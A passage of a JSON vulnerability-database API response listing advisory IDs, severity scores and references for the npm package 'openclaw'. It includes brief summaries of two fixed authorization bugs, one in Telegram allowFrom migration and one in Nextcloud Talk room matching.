"VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "GHSA-48vw-m3qc-wr99" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3pqp-bneb-mbc4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90102?format=api", "vulnerability_id": "VCID-3wsw-d4z2-dydt", "summary": "OpenClaw: Telegram legacy allowFrom migration fans default-account trust into all named accounts\n## Summary\nTelegram legacy allowFrom migration fans default-account trust into all named accounts\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 Telegram migration fans legacy default-account allowFrom trust into named accounts, which is an in-scope auth-boundary bug and low fits.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `d8c68c8d4265ea6fa5e8c5e056534c351bddef37` — 2026-03-31T12:51:38+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d8c68c8d4265ea6fa5e8c5e056534c351bddef37", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/d8c68c8d4265ea6fa5e8c5e056534c351bddef37" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f693-58pc-2gfr", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-f693-58pc-2gfr" }, { "reference_url": "https://github.com/advisories/GHSA-f693-58pc-2gfr", "reference_id": "GHSA-f693-58pc-2gfr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-f693-58pc-2gfr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "GHSA-f693-58pc-2gfr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3wsw-d4z2-dydt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91662?format=api", "vulnerability_id": "VCID-3xeb-phgc-vkcg", "summary": "OpenClaw: Nextcloud Talk room allowlist matched colliding room names instead of stable room tokens\n## Summary\nNextcloud Talk room authorization matched on collidable room names instead of the stable room token, allowing policy confusion across similarly named rooms.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/nextcloud-talk/src/inbound.ts now resolves allowlist policy from roomToken-backed room identity.\n- extensions/nextcloud-talk/src/policy.ts now keys room authorization on stable room tokens instead of display names.\n\nOpenClaw thanks @zpbrent for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35624", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00069", "scoring_system": "epss", "scoring_elements": "0.21321", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00069", "scoring_system": "epss", "scoring_elements": "0.21369", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00069", "scoring_system": "epss", "scoring_elements": "0.21384", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35624" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xhq5-45pm-2gjr", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xhq5-45pm-2gjr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35624", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35624" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-policy-confusion-via-room-name-collision-in-nextcloud-talk", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-policy-confusion-via-room-name-collision-in-nextcloud-talk" }, { "reference_url": "https://github.com/advisories/GHSA-xhq5-45pm-2gjr", "reference_id": "GHSA-xhq5-45pm-2gjr", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-xhq5-45pm-2gjr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { 